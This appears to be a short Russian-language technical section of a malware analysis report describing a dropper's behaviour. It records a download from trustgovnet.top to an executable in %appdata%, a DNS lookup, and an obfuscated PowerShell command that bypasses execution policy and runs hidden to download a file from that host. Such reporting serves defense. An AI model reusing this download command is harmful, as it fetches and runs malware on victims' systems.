Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^E^r^s^helL.^exe ^-exEcu^tiO^NpO^liCy BypasS ^-noPro^Fi^L^e -^wiN^dOWsT^y^LE h^i^DDE^n^ (neW-o^B^JeCt s^YsteM.NET.WEBC^lIe^nT)^.^DoWN^L^OaDFiLe('http://trustgovnet.top/...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /c "POw^E^r^s^helL.^exe ^-exEcu^tiO^NpO^liCy BypasS ^-noPro^Fi^L^e -^wiN^dOWsT^y^LE h^i^DDE^n^ (neW-o^B^JeCt s^YsteM.NET.WEBC^lIe^nT)^.^DoWN^L^OaDFiLe('http://trustgovnet.top/...' (со скрытым окном)